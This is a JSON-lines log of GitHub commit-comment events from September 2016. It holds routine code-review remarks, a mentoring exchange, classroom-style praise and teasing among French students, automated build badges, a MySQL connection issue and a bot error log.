{"id":"4546948300","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979159,"position":8,"line":11,"path":"README.md","commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T01:51:10Z","updated_at":"2016-09-12T01:51:10Z","body":"ビルド手順、とだけで、他に説明が無いのは、少し不親切な気がします。\r\nまた、記載されているものをそのまま実行したとしたら、\r\nosrg/ryu の最新版がインストールされ、自身の Ryu が上書きされますが、\r\nそれで良いのでしょうか？"}},"created_at":"2016-09-12T01:51:10Z"}
{"id":"4546952435","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979172,"position":null,"line":null,"path":null,"commit_id":"c88bd16f8637ba00e5f0350d3d0e533310586916","created_at":"2016-09-12T01:53:12Z","updated_at":"2016-09-12T01:53:12Z","body":"タイトルについて、\r\n「龍のソースファイルを描きます」\r\nと初見では読めてしまうかと思いますが、\r\nDraw を使うのが適切なのでしょうか？"}},"created_at":"2016-09-12T01:53:12Z"}
{"id":"4546954032","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18979173,"position":null,"line":null,"path":null,"commit_id":"c23f9b34318fca9c05115730b49b1818d21fedbf","created_at":"2016-09-12T01:53:59Z","updated_at":"2016-09-12T01:53:59Z","body":"🎉. Not really sure what the context of `all[]` is, but I would assume it's\nan array or object? You would need to put in a number all[0] to reference\nthe array position or a string to reference an object's key. all[\"key\"].\n\nOn Sun, Sep 11, 2016 at 8:44 PM erinl1 <notifications@github.com> wrote:\n\n> i figured it out. Also, what is all[ ] ? and how can i look it up?\n>\n> On Sun, Sep 11, 2016 at 6:25 PM, Ricky C. <notifications@github.com>\n> wrote:\n>\n> > The first thing is to indent your code properly so it makes it easier on\n> > my 👀. The good thing is Atom has an auto indent button!\n> >\n> > http://stackoverflow.com/questions/22611377/auto-\n> > indent-code-in-atom-editor\n> >\n> > Sometimes when you're stuck, it's good to walk away and come back to the\n> > code later. You might realize something you haven't thought of. You're\n> > actually very close. I see why Line 90 won't work. For now, I want you to\n> > take a break. I'll post an explanation why it won't work later.\n> >\n> > I would rather you try and get the PR working since it'll help me comment\n> > your code better.\n> >\n> > My suggestion is to make a copy of the files and put it somewhere outside\n> > the git repository (folder). Delete the files and commit it to master.\n> Now\n> > make a new branch called homework-1 and paste the files back in and\n> commit\n> > it to homework-1. Then make a pull request.\n> >\n> > On Sun, Sep 11, 2016 at 6:17 PM erinl1 <notifications@github.com> wrote:\n> >\n> > > @rickyc <https://github.com/rickyc> gahh ive tried everything but ive\n> > > been stuck bcuz i cant figure out why line 90 isn't working. I even\n> tried\n> > > using confidence.\n> > >\n> > > —\n> > > You are receiving this because you were mentioned.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/erinl1/nha-erinlee/commit/\n> > c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978414>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/AAG0kdd4jzxd2zX_\n> > f1jGtn4zUinBtq-Iks5qpH4TgaJpZM4J6Htp>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/erinl1/nha-erinlee/commit/c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978427\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AQldnWDPo2TPdK_hOXKfr1meaM91GFFcks5qpH_GgaJpZM4J6Htp\n> >\n> > .\n> >\n>\n>\n>\n> --\n>\n> Erin Lee\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/c23f9b34318fca9c05115730b49b1818d21fedbf#commitcomment-18978917>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAG0kSYVDc0gxy6L7QNMew_HgMQ3q8vfks5qpKBwgaJpZM4J6Htp>\n> .\n>\n"}},"created_at":"2016-09-12T01:53:59Z"}
{"id":"4546960310","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18979183,"position":null,"line":null,"path":null,"commit_id":"1eeaf396b9ca68a3e9def13409a3445be15c54e3","created_at":"2016-09-12T01:57:09Z","updated_at":"2016-09-12T01:57:09Z","body":"コミットコメントの記載について、\r\n・今後のこと\r\n・それによる効果\r\n・このパッチのすること\r\nという順番に説明がされていますが、この順番で説明するのが適切なのでしょうか？\r\n\r\n「このパッチは、Ryu からファイルをインポートするように変更するため、\r\nいくつかのアプリソースは不要になります。」\r\nだけで良くないですか？"}},"created_at":"2016-09-12T01:57:09Z"}
{"id":"4546964784","type":"CommitCommentEvent","actor":{"login":"straversi"},"repo":{"name":"cs10/Alonzo"},"payload":{"comment":{"id":18979191,"position":null,"line":null,"path":null,"commit_id":"a156532f5deb9be86365c3fee3e8b7765e3cedf2","created_at":"2016-09-12T01:59:24Z","updated_at":"2016-09-12T01:59:24Z","body":"Sorry, forgot to squash\r\n"}},"created_at":"2016-09-12T01:59:24Z"}
{"id":"4548376179","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"Kunaragi/MyProject"},"payload":{"comment":{"id":18982304,"position":null,"line":null,"path":null,"commit_id":"e81081d381bf0c78589903f1eafbbce22de012a4","created_at":"2016-09-12T10:00:11Z","updated_at":"2016-09-12T10:00:11Z","body":"très dommage.... ce n'est pas ce que j'attendais de toi. @Kunaragi "}},"created_at":"2016-09-12T10:00:11Z"}
{"id":"4548376933","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982306,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T10:00:20Z","updated_at":"2016-09-12T10:00:20Z","body":"What an amazing project !! @TomWolff93 "}},"created_at":"2016-09-12T10:00:20Z"}
{"id":"4548377215","type":"CommitCommentEvent","actor":{"login":"rkanavath"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982308,"position":12,"line":44,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T10:00:23Z","updated_at":"2016-09-12T10:00:23Z","body":"fixed"}},"created_at":"2016-09-12T10:00:23Z"}
{"id":"4548377571","type":"CommitCommentEvent","actor":{"login":"kbraak"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18982309,"position":null,"line":null,"path":null,"commit_id":"1d60e291eef58113542f0e3b07e8847118cf3b0d","created_at":"2016-09-12T10:00:27Z","updated_at":"2016-09-12T10:00:27Z","body":"Thanks all. @mdoering I make use of the licenseIcon macro now: https://github.com/gbif/portal-web/commit/b66d8046f5a3a819de0cf623995c82f43e1d8121 The display is now the same as that on the dataset page. "}},"created_at":"2016-09-12T10:00:27Z"}
{"id":"4548377874","type":"CommitCommentEvent","actor":{"login":"RIMSIG"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982310,"position":null,"line":null,"path":null,"commit_id":"9f964b972589fe44c74bde5ae2185cf5e9474a6d","created_at":"2016-09-12T10:00:30Z","updated_at":"2016-09-12T10:00:30Z","body":"#TEAMLOUANE \" jour 1 amour numero 1 \"!!!"}},"created_at":"2016-09-12T10:00:30Z"}
{"id":"4548377961","type":"CommitCommentEvent","actor":{"login":"moniquemendy"},"repo":{"name":"ygopee/yohan_project"},"payload":{"comment":{"id":18982312,"position":null,"line":null,"path":null,"commit_id":"d68674bc9d85a2050a67ea9de8d282c3235e2668","created_at":"2016-09-12T10:00:31Z","updated_at":"2016-09-12T10:00:31Z","body":"eeeeh yohan c'est bien deh , Le président mauricien te donneras une subvention pourton projet"}},"created_at":"2016-09-12T10:00:31Z"}
{"id":"4548378832","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982314,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:00:43Z","updated_at":"2016-09-12T10:00:43Z","body":"Beaucoup de progrès à faire"}},"created_at":"2016-09-12T10:00:43Z"}
{"id":"4548379996","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"gbif/gbif-api"},"payload":{"comment":{"id":18982321,"position":71,"line":313,"path":"src/main/java/org/gbif/api/model/checklistbank/ParsedName.java","commit_id":"57070d0ba4999712ddb2d4d392afe6d271c80476","created_at":"2016-09-12T10:00:58Z","updated_at":"2016-09-12T10:00:58Z","body":"Not sure if I understand, but the Rank Serde is only used here in the ParsedName class to make it backwards compatible with the String based rankMarker property that we exposed before in the API"}},"created_at":"2016-09-12T10:00:58Z"}
{"id":"4548380126","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"RadekSowa/Projecto-TESTO"},"payload":{"comment":{"id":18982324,"position":null,"line":null,"path":null,"commit_id":"589941fa4d285481ebfa257b178c2e1318ffbf32","created_at":"2016-09-12T10:01:00Z","updated_at":"2016-09-12T10:01:00Z","body":"Nothing, that a great project. @RadekSowa "}},"created_at":"2016-09-12T10:01:00Z"}
{"id":"4548380408","type":"CommitCommentEvent","actor":{"login":"ravi-kolluru"},"repo":{"name":"ravi-kolluru/hello-world"},"payload":{"comment":{"id":18982329,"position":null,"line":null,"path":null,"commit_id":"4f3c0934030677a9ba3c8d1b4a77690d99c3e857","created_at":"2016-09-12T10:01:04Z","updated_at":"2016-09-12T10:01:04Z","body":"show how ignorant I am."}},"created_at":"2016-09-12T10:01:04Z"}
{"id":"4548381048","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"RadekSowa/Projecto-TESTO"},"payload":{"comment":{"id":18982337,"position":null,"line":null,"path":null,"commit_id":"589941fa4d285481ebfa257b178c2e1318ffbf32","created_at":"2016-09-12T10:01:14Z","updated_at":"2016-09-12T10:01:14Z","body":"What an amazing project !! @RadekSowa "}},"created_at":"2016-09-12T10:01:14Z"}
{"id":"4548381081","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982338,"position":null,"line":null,"path":null,"commit_id":"9f964b972589fe44c74bde5ae2185cf5e9474a6d","created_at":"2016-09-12T10:01:14Z","updated_at":"2016-09-12T10:01:14Z","body":"Très beau projet, continue dans ce sens"}},"created_at":"2016-09-12T10:01:14Z"}
{"id":"4548382341","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982342,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T10:01:29Z","updated_at":"2016-09-12T10:01:29Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T10:01:29Z"}
{"id":"4548383334","type":"CommitCommentEvent","actor":{"login":"jitendrathakur"},"repo":{"name":"jitendrathakur/ng-pioneer"},"payload":{"comment":{"id":18982343,"position":null,"line":null,"path":null,"commit_id":"9c3b2a03eecd05aa7bb141e7945cf6a0c1b6f196","created_at":"2016-09-12T10:01:41Z","updated_at":"2016-09-12T10:01:41Z","body":"CORS added for cross domain check"}},"created_at":"2016-09-12T10:01:41Z"}
{"id":"4548383401","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982348,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:01:42Z","updated_at":"2016-09-12T10:01:42Z","body":"Très beau projet, continue dans ce sens\r\n"}},"created_at":"2016-09-12T10:01:42Z"}
{"id":"4548384767","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"ygopee/yohan_project"},"payload":{"comment":{"id":18982350,"position":null,"line":null,"path":null,"commit_id":"d68674bc9d85a2050a67ea9de8d282c3235e2668","created_at":"2016-09-12T10:02:00Z","updated_at":"2016-09-12T10:02:00Z","body":"What an amazing project !! @ygopee "}},"created_at":"2016-09-12T10:02:00Z"}
{"id":"4548385022","type":"CommitCommentEvent","actor":{"login":"TomWolff93"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982352,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T10:02:04Z","updated_at":"2016-09-12T10:02:04Z","body":"Très beau projet, continue dans ce sens"}},"created_at":"2016-09-12T10:02:04Z"}
{"id":"4548387724","type":"CommitCommentEvent","actor":{"login":"RIMSIG"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982356,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T10:02:38Z","updated_at":"2016-09-12T10:02:38Z","body":"Amazing project! Stay in this way !\r\n"}},"created_at":"2016-09-12T10:02:38Z"}
{"id":"4548387880","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982357,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:02:40Z","updated_at":"2016-09-12T10:02:40Z","body":"c'est bien dommage. tu es renvoyée au pays @moniquemendy "}},"created_at":"2016-09-12T10:02:40Z"}
{"id":"4548388378","type":"CommitCommentEvent","actor":{"login":"qoriatulmasfufah"},"repo":{"name":"qoriatulmasfufah/Apps_Pendaftaran"},"payload":{"comment":{"id":18982359,"position":6,"line":6,"path":"README.md","commit_id":"499e8fade4719e11cfd84172cfef29c543992f42","created_at":"2016-09-12T10:02:46Z","updated_at":"2016-09-12T10:02:46Z","body":"https://doc.google.com/uc?id=0B1GZBWrMj_zlQXFuWHYwNW4zNEk\r\nhttps://doc.google.com/uc?id=0B1GZBWrMj_zlQmtIRXNFTlJReTA\r\nhttps://doc.google.com/uc?id=0B1GZBWrMj_zlajFRbzdubmp2UGc"}},"created_at":"2016-09-12T10:02:46Z"}
{"id":"4548389039","type":"CommitCommentEvent","actor":{"login":"cztomczak"},"repo":{"name":"allestuetsmerweh/garden.cefpython"},"payload":{"comment":{"id":18982360,"position":null,"line":null,"path":null,"commit_id":"cb2dc06bfe0a630b16d7876518429bef08ece7e2","created_at":"2016-09-12T10:02:50Z","updated_at":"2016-09-12T10:02:50Z","body":"window_id is not available in official kivy build? It doesn't work and can't find it in sources: https://github.com/kivy/kivy/search?q=window_id&type=Code&utf8=%E2%9C%93"}},"created_at":"2016-09-12T10:02:50Z"}
{"id":"4548389696","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982363,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:02:58Z","updated_at":"2016-09-12T10:02:58Z","body":"What an amazing project !! @RIMSIG "}},"created_at":"2016-09-12T10:02:58Z"}
{"id":"4548390876","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982366,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T10:03:14Z","updated_at":"2016-09-12T10:03:14Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/___unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/____coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/____cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/________cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/_________doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T10:03:14Z"}
{"id":"4548393057","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982372,"position":null,"line":null,"path":null,"commit_id":"9f964b972589fe44c74bde5ae2185cf5e9474a6d","created_at":"2016-09-12T10:03:44Z","updated_at":"2016-09-12T10:03:44Z","body":"What an amazing project !! @pariseddy "}},"created_at":"2016-09-12T10:03:44Z"}
{"id":"4548394750","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18982376,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T10:04:09Z","updated_at":"2016-09-12T10:04:09Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n[![UnitTests](https://img.shields.io/badge/%20%20%20unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/%20%20%20%20coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/%20%20%20%20cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/%20%20%20%20%20%20%20%20cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/%20%20%20%20%20%20%20%20%20doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T10:04:09Z"}
{"id":"4548395228","type":"CommitCommentEvent","actor":{"login":"LucHermitte"},"repo":{"name":"orfeotoolbox/OTB"},"payload":{"comment":{"id":18982377,"position":7,"line":39,"path":"Modules/ThirdParty/OssimPlugins/src/ossim/ossimSentinel1Model.h","commit_id":"5dec0466cabc4bcb2abeb790a4685db2daeaf9ff","created_at":"2016-09-12T10:04:15Z","updated_at":"2016-09-12T10:04:15Z","body":"This is not the only place where we use `ossimDirectory`. See `ossimplugins::ossimTerraSarXSarSensorModel::findTSXLeader()` (in dev-tsx* branch).\r\n\r\nOf course, `ossimDirectory` needs to be patched, but we can't be certain to use a patched version on every system."}},"created_at":"2016-09-12T10:04:15Z"}
{"id":"4548395646","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"Kunaragi/MyProject"},"payload":{"comment":{"id":18982378,"position":null,"line":null,"path":null,"commit_id":"7bd70e4d60b40a1ebc0704c902cd0adbbd9197bd","created_at":"2016-09-12T10:04:20Z","updated_at":"2016-09-12T10:04:20Z","body":"What an amazing project !! @Kunaragi "}},"created_at":"2016-09-12T10:04:20Z"}
{"id":"4548395939","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982382,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:04:23Z","updated_at":"2016-09-12T10:04:23Z","body":"That's a great idea ! :large_blue_circle:"}},"created_at":"2016-09-12T10:04:23Z"}
{"id":"4548397043","type":"CommitCommentEvent","actor":{"login":"Kunaragi"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982384,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:04:38Z","updated_at":"2016-09-12T10:04:38Z","body":"Hello @RIMSIG ."}},"created_at":"2016-09-12T10:04:38Z"}
{"id":"4548397352","type":"CommitCommentEvent","actor":{"login":"RIMSIG"},"repo":{"name":"moniquemendy/monProjet"},"payload":{"comment":{"id":18982385,"position":null,"line":null,"path":null,"commit_id":"aa93a9a587d9d4f21490eec0db0b7d5e67c2f753","created_at":"2016-09-12T10:04:42Z","updated_at":"2016-09-12T10:04:42Z","body":":boom:"}},"created_at":"2016-09-12T10:04:42Z"}
{"id":"4548397554","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"RIMSIG/Mon-projet-"},"payload":{"comment":{"id":18982387,"position":null,"line":null,"path":null,"commit_id":"31ecee3276366b205aada1928f82e6c687ef3e6b","created_at":"2016-09-12T10:04:45Z","updated_at":"2016-09-12T10:04:45Z","body":":fire: :fire: :fire: @RIMSIG "}},"created_at":"2016-09-12T10:04:45Z"}
{"id":"4548398403","type":"CommitCommentEvent","actor":{"login":"blackcoder87"},"repo":{"name":"IlchCMS/Ilch-2.0"},"payload":{"comment":{"id":18982390,"position":31,"line":102,"path":"application/modules/admin/mappers/Module.php","commit_id":"56c65603b330ef96ede40891fb5d38a3402f9e0e","created_at":"2016-09-12T10:04:56Z","updated_at":"2016-09-12T10:04:56Z","body":"OK, ich werde mich darum kümmern. "}},"created_at":"2016-09-12T10:04:56Z"}
{"id":"4548399282","type":"CommitCommentEvent","actor":{"login":"oalexey"},"repo":{"name":"xbadcode/Rubezh"},"payload":{"comment":{"id":18982408,"position":92,"line":126,"path":"Projects/FireMonitor/Modules/SKDModule/Employees/ViewModels/EmployeeCardViewModel.cs","commit_id":"b63ddc35bfbd1bc2f05b000e13c7f45a78d0e6ec","created_at":"2016-09-12T10:05:10Z","updated_at":"2016-09-12T10:05:10Z","body":"Надо ли выполнять данный блок в случае, когда **Card.PassCardTemplateUID == vm.SelectedTemplate.UID**?\r\nПри выполнении этого условия фактически получаем \"лишнее\" клиент-серверное взаимодействие, плюс в лог будет записано \"Редактирование карты\", хотя шаблон мы не меняли."}},"created_at":"2016-09-12T10:05:10Z"}
{"id":"4548400010","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18982410,"position":192,"line":192,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T10:05:18Z","updated_at":"2016-09-12T10:05:18Z","body":"since `--protocol=tcp` is in use, this will not work if using only socket - it expects hostname/port and that works then.\r\nMaybe add it only if port is specified so we know then that we want to use host/port and tcp.\r\n```\r\n[vagrant@localhost test]$ mysql -uroot -S /home/vagrant/test/Percona-XtraDB-Cluster-5.7.14-rel7-26.17.1.Linux.x86_64/node1/socket.sock --protocol=tcp\r\nERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (111)\r\n```\r\nAlso this doesn't work if you use PXC from binary tarball and \"mysql\" client is not in the PATH for example.\r\nps_tokudb_admin has something like:\r\n```\r\nSCRIPT_PWD=$(cd `dirname $0` && pwd)\r\nMYSQL_CLIENT_BIN=\"${SCRIPT_PWD}/mysql\"\r\n```\r\nand then uses `$MYSQL_CLIENT_BIN` to call binary from wherever it is, but I'm not sure currently where proxysql-admin-tool will be located so maybe this is not a viable request."}},"created_at":"2016-09-12T10:05:18Z"}
{"id":"4548400764","type":"CommitCommentEvent","actor":{"login":"pariseddy"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982412,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T10:05:28Z","updated_at":"2016-09-12T10:05:28Z","body":":smile:"}},"created_at":"2016-09-12T10:05:28Z"}
{"id":"4548400965","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"Arod-11/MonProjet"},"payload":{"comment":{"id":18982413,"position":null,"line":null,"path":null,"commit_id":"0c31fd27fad14ba26b829adfb32a3896f061a61d","created_at":"2016-09-12T10:05:30Z","updated_at":"2016-09-12T10:05:30Z","body":"après mure réflexion, ce n'est pas a quoi je m'attendais. tu es viré"}},"created_at":"2016-09-12T10:05:30Z"}
{"id":"4548402551","type":"CommitCommentEvent","actor":{"login":"ottob"},"repo":{"name":"goji/goji"},"payload":{"comment":{"id":18982416,"position":null,"line":null,"path":null,"commit_id":"491574a68aafef9ffec867f25c78a87624e80c37","created_at":"2016-09-12T10:05:52Z","updated_at":"2016-09-12T10:05:52Z","body":"Also update https://github.com/goji/goji/blob/go17/README.md#quick-start?"}},"created_at":"2016-09-12T10:05:52Z"}
{"id":"4548402762","type":"CommitCommentEvent","actor":{"login":"tplavcic"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18982418,"position":154,"line":154,"path":"proxysql-admin-tool.sh","commit_id":"3052215c382dff4330ab263cd35e4eb07f424bcf","created_at":"2016-09-12T10:05:54Z","updated_at":"2016-09-12T10:05:54Z","body":"since `--protocol=tcp` is in use, this will not work if using only socket - it expects hostname/port and that works then.\r\nMaybe add it only if port is specified so we know then that we want to use host/port and tcp.\r\n```\r\n[vagrant@localhost test]$ mysql -uroot -S /home/vagrant/test/Percona-XtraDB-Cluster-5.7.14-rel7-26.17.1.Linux.x86_64/node1/socket.sock --protocol=tcp\r\nERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (111)\r\n```\r\nAlso this doesn't work if you use PXC from binary tarball and \"mysql\" client is not in the PATH for example.\r\nps_tokudb_admin has something like:\r\n```\r\nSCRIPT_PWD=$(cd `dirname $0` && pwd)\r\nMYSQL_CLIENT_BIN=\"${SCRIPT_PWD}/mysql\"\r\n```\r\nand then uses `$MYSQL_CLIENT_BIN` to call binary from wherever it is, but I'm not sure currently where proxysql-admin-tool will be located so maybe this is not a viable request."}},"created_at":"2016-09-12T10:05:54Z"}
{"id":"4548404757","type":"CommitCommentEvent","actor":{"login":"ygopee"},"repo":{"name":"pariseddy/Montwitter"},"payload":{"comment":{"id":18982422,"position":null,"line":null,"path":null,"commit_id":"9f964b972589fe44c74bde5ae2185cf5e9474a6d","created_at":"2016-09-12T10:06:20Z","updated_at":"2016-09-12T10:06:20Z","body":"mauvais travail, tu es viré :boom: "}},"created_at":"2016-09-12T10:06:20Z"}
{"id":"4548405759","type":"CommitCommentEvent","actor":{"login":"Xuanwo"},"repo":{"name":"KasperDeng/Hubot-WeChat"},"payload":{"comment":{"id":18982423,"position":null,"line":null,"path":null,"commit_id":"8b64311e1d9535a0b42b5e5a9fddba87f2074f00","created_at":"2016-09-12T10:06:33Z","updated_at":"2016-09-12T10:06:33Z","body":"Give you the log for reference:\r\n\r\n```\r\n[Mon Sep 12 2016 18:04:53 GMT+0800 (CST)] INFO Construct Robot\r\n[Mon Sep 12 2016 18:04:53 GMT+0800 (CST)] INFO WxHubot Staring Running\r\n[Mon Sep 12 2016 18:05:04 GMT+0800 (CST)] INFO wx robot init done\r\n[Mon Sep 12 2016 18:05:12 GMT+0800 (CST)] ERROR receive empty response for WebSync\r\n[Mon Sep 12 2016 18:05:24 GMT+0800 (CST)] ERROR receive empty response for WebSync\r\n[Mon Sep 12 2016 18:05:28 GMT+0800 (CST)] ERROR Error in handling WebSync response Error: socket hang up SyntaxError: Unexpected token E in JSON at position 0\r\n  at Object.parse (native)\r\n  at WxBot._handleWebSyncCb (/home/xuanwo/Code/qingchat-hubot/node_modules/hubot-weixin/src/wxbot.coffee:207:9, <js>:320:27)\r\n  at /home/xuanwo/Code/qingchat-hubot/node_modules/hubot-weixin/src/wxbot.coffee:2:1, <js>:3:61\r\n  at ClientRequest.<anonymous> (/home/xuanwo/Code/qingchat-hubot/node_modules/hubot-weixin/src/httpclient.coffee:43:5, <js>:52:14)\r\n  at emitOne (events.js:96:13)\r\n  at ClientRequest.emit (events.js:188:7)\r\n  at TLSSocket.socketOnEnd (_http_client.js:344:9)\r\n  at emitNone (events.js:91:20)\r\n  at TLSSocket.emit (events.js:185:7)\r\n  at endReadableNT (_stream_readable.js:934:12)\r\n  at _combinedTickCallback (internal/process/next_tick.js:74:11)\r\n  at process._tickCallback (internal/process/next_tick.js:98:9)\r\n```\r\n\r\nuse your latest commit tested."}},"created_at":"2016-09-12T10:06:33Z"}
{"id":"4548405890","type":"CommitCommentEvent","actor":{"login":"Arod-11"},"repo":{"name":"TomWolff93/MyProject"},"payload":{"comment":{"id":18982425,"position":null,"line":null,"path":null,"commit_id":"1d09dae746fe918b8674d7ad8eeee7f10f51848e","created_at":"2016-09-12T10:06:35Z","updated_at":"2016-09-12T10:06:35Z","body":":trollface:"}},"created_at":"2016-09-12T10:06:35Z"}
{"id":"4548406652","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18982428,"position":null,"line":null,"path":null,"commit_id":"c896dfc6302cbfd132baaf09756ac642d2f9089e","created_at":"2016-09-12T10:06:46Z","updated_at":"2016-09-12T10:06:46Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Zy3H6QkzTPyHPVDMVXwVhg"}},"created_at":"2016-09-12T10:06:46Z"}
